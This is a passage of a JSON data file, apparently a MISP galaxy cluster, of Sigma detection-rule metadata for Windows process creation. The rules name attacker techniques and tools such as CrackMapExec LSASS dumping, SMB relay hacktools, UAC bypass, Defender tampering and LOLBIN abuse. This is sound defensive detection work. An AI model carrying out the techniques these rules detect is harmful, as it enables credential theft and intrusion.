creation of local users via the net.exe command with the option \"never expire\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-12", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_net_user_add_never_expire.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml" ], "tags": [ "attack.persistence", "attack.t1136.001" ] }, "related": [ { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", "value": "New User Created Via Net.EXE With Never Expire Option" }, { "description": "Detects the installation of an Exchange Transport Agent", "meta": { "author": "Tobias Michalski (Nextron Systems)", "creation_date": "2021-06-08", "falsepositive": [ "Legitimate installations of Exchange TransportAgents. AssemblyPath is a good indicator for this." 
], "filename": "proc_creation_win_powershell_msexchange_transport_agent.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml" ], "tags": [ "attack.persistence", "attack.t1505.002" ] }, "related": [ { "dest-uuid": "35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "83809e84-4475-4b69-bc3e-4aad8568612f", "value": "MSExchange Transport Agent Installation" }, { "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f26307d8-14cd-47e3-a26b-4b4769f24af6", "value": "HackTool - CrackMapExec Process Patterns" }, { "description": "Detects base64 encoded \"MpPreference\" PowerShell cmdlet code that tries to modify or tamper with Windows Defender AV", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-04", "falsepositive": [ "Unknown" ], "filename": 
"proc_creation_win_powershell_base64_mppreference.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", "https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c6fb44c6-71f5-49e6-9462-1425d328aee3", "value": "Powershell Base64 Encoded MpPreference Cmdlet" }, { "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-29", "falsepositive": [ "Programs that use the same command line flags" ], "filename": "proc_creation_win_hktl_sharpldapwhoami.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/bugch3ck/SharpLdapWhoami", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml" ], "tags": [ "attack.discovery", "attack.t1033", "car.2016-03-001" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", "value": "HackTool - SharpLdapWhoami Execution" }, { "description": "Detects a potentially suspicious execution of a parent process located in the 
\"\\Users\\Public\" folder executing a child process containing references to shell or scripting binaries and commandlines.\n", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-02-25", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/blackbyte-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1564", "attack.t1059" ] }, "related": [ { "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "value": "Potentially Suspicious Execution From Parent Process In Public Folder" }, { "description": "Detection of unusual child processes by different system processes", "meta": { "author": "Semanur Guneysu @semanurtg, oscd.community", "creation_date": "2020-10-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_abusing_debug_privilege.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548" ] }, "related": [ { "dest-uuid": 
"67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d522eca2-2973-4391-a3e0-ef0374321dae", "value": "Abused Debug Privilege by Arbitrary Parent Processes" }, { "description": "Detects the execution of the \"cloudflared\" binary from a non standard location.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-12-20", "falsepositive": [ "Legitimate usage of Cloudflared portable versions" ], "filename": "proc_creation_win_cloudflared_portable_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/cloudflare/cloudflared", "https://www.intrinsec.com/akira_ransomware/", "https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/", "https://github.com/cloudflare/cloudflared/releases", "https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_portable_execution.yml" ], "tags": [ "attack.command-and-control", "attack.t1090.001" ] }, "related": [ { "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fadb84f0-4e84-4f6d-a1ce-9ef2bffb6ccd", "value": "Cloudflared Portable Execution" }, { "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2022-04-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_node_adobe_creative_cloud_abuse.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mttaggart/status/1511804863293784064", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127", "attack.t1059.007" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", "value": "Node Process Executions" }, { "description": "Detects python spawning a pretty tty", "meta": { "author": "Nextron Systems", "creation_date": "2022-06-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_python_pty_spawn.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_pty_spawn.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "value": "Python Spawning Pretty TTY on Windows" }, { "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", "value": "UAC Bypass Using Consent and Comctl32 - Process" }, { "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", "meta": { "author": "Sreeman", "creation_date": "2020-04-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_hiding_malware_in_fonts_folder.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml" ], "tags": [ "attack.t1211", "attack.t1059", "attack.defense-evasion", "attack.persistence" ] }, "related": [ { "dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ae9b0bd7-8888-4606-b444-0ed7410cb728", "value": "Writing Of Malicious Files To The Fonts Folder" }, { "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft 
Visual Studio package.\n", "meta": { "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", "creation_date": "2020-10-14", "falsepositive": [ "The process spawned by vsjitdebugger.exe is uncommon." ], "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/", "https://twitter.com/pabraeken/status/990758590020452353", "https://learn.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" ], "tags": [ "attack.t1218", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", "value": "Malicious PE Execution by Microsoft Visual Studio Debugger" }, { "description": "Detect attacker collecting audio via SoundRecorder application.", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Legitimate audio capture by legitimate user." 
], "filename": "proc_creation_win_soundrecorder_audio_capture.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", "https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_soundrecorder_audio_capture.yml" ], "tags": [ "attack.collection", "attack.t1123" ] }, "related": [ { "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "83865853-59aa-449e-9600-74b9d89a6d6e", "value": "Audio Capture via SoundRecorder" }, { "description": "Detects execution of \"curl.exe\" with the \"--insecure\" flag.", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-30", "falsepositive": [ "Access to badly maintained internal or development systems" ], "filename": "proc_creation_win_curl_insecure_connection.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://curl.se/docs/manpage.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml" ], "tags": [ "attack.execution" ] }, "uuid": "cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec", "value": "Insecure Transfer Via Curl.EXE" }, { "description": "Detects execution of the AgentExecutor.exe binary. 
Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "creation_date": "2022-12-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_agentexecutor_susp_usage.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/jseerden/status/1247985304667066373/photo/1", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", "https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension", "https://twitter.com/lefterispan/status/1286259016436514816", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_agentexecutor_susp_usage.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", "value": "Suspicious AgentExecutor PowerShell Execution" }, { "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-08-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_java_sysaidserver_susp_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_sysaidserver_susp_child_process.yml" ], "tags": [ "attack.lateral-movement", 
"attack.t1210" ] }, "related": [ { "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", "value": "Suspicious SysAidServer Child" }, { "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", "meta": { "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-06-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_double_extension.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/blackorbird/status/1140519090961825792", "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", "value": "Suspicious Double Extension File Execution" }, { "description": "Detects renamed execution of \"Microsoft.NodejsTools.PressAnyKey.exe\", which can be abused as a LOLBIN to execute arbitrary binaries", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "creation_date": "2023-04-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_pressanykey.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5", 
"https://twitter.com/mrd0x/status/1463526834918854661", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "65c3ca2c-525f-4ced-968e-246a713d164f", "value": "Visual Studio NodejsTools PressAnyKey Renamed Execution" }, { "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64 where the files are located in potentially suspicious locations", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certutil_encode_susp_location.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior", "https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior", "https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior", "https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "82a6714f-4899-4f16-9c1e-9a333544d4c3", "value": "File In Suspicious Location Encoded To Base64 Via Certutil.EXE" }, { "description": "Detects the execution of 
\"whoami.exe\" with the \"/FO\" flag to choose CSV as output format or with redirection options to export the results to a file for later use.", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_whoami_output.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_output.yml" ], "tags": [ "attack.discovery", "attack.t1033", "car.2016-03-001" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", "value": "Whoami.EXE Execution With Output Option" }, { "description": "Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)", "creation_date": "2022-11-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_gpg4win_susp_location.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/", "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_susp_location.yml" ], "tags": [ "attack.execution" ] }, "uuid": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", 
"value": "File Encryption/Decryption Via Gpg4win From Suspicious Locations" }, { "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", "meta": { "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "creation_date": "2020-10-07", "falsepositive": [ "Utilization of this tool should not be seen in enterprise environment" ], "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Vbc/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.004" ] }, "related": [ { "dest-uuid": "c726e0a2-a57a-4b7b-a973-d0f013246617", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7b10f171-7f04-47c7-9fa2-5be43c76e535", "value": "Visual Basic Command Line Compiler Usage" }, { "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-07-24", "falsepositive": [ "Legitimate files with these rare hacktool names" ], "filename": "proc_creation_win_hktl_relay_attacks_tools.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", "https://www.localpotato.com/", "https://pentestlab.blog/2017/04/13/hot-potato/", "https://github.com/ohpe/juicy-potato", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml" ], "tags": [ "attack.execution", "attack.t1557.001" ] }, "related": [ { "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5589ab4f-a767-433c-961d-c91f3f704db1", "value": "Potential SMB Relay Attack Tool Execution" }, { "description": "Detects the execution of \".xbap\" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious \".xbap\" files and bypass AWL\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-01", "falsepositive": [ "Legitimate \".xbap\" being executed via \"PresentationHost\"" ], "filename": "proc_creation_win_presentationhost_uncommon_location_exec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", "value": "XBAP Execution From Uncommon Locations Via PresentationHost.EXE" }, { "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the Cobalt group", "meta": { "author": "Markus Neis, Swisscom", "creation_date": "2019-06-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_jusched.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_jusched.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", "value": "Renamed Jusched.EXE Execution" }, { "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy", "creation_date": "2020-05-12", "falsepositive": [ "Legitimate administrative use" ], "filename": "proc_creation_win_pua_advanced_ip_scanner.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner", "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml" ], "tags": [ "attack.discovery", "attack.t1046", "attack.t1135" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { 
"dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", "value": "PUA - Advanced IP Scanner Execution" }, { "description": "Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_copy_system_dir_lolbin.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/", "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f5d19838-41b5-476c-98d8-ba8af4929ee2", "value": "LOL-Binary Copied From System Directory" }, { "description": "Detects the use of the Microsoft signed script \"CL_mutexverifiers\" to proxy the execution of additional PowerShell script commands", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113", "creation_date": "2022-05-21", "falsepositive": [ "Unknown" ], "filename": 
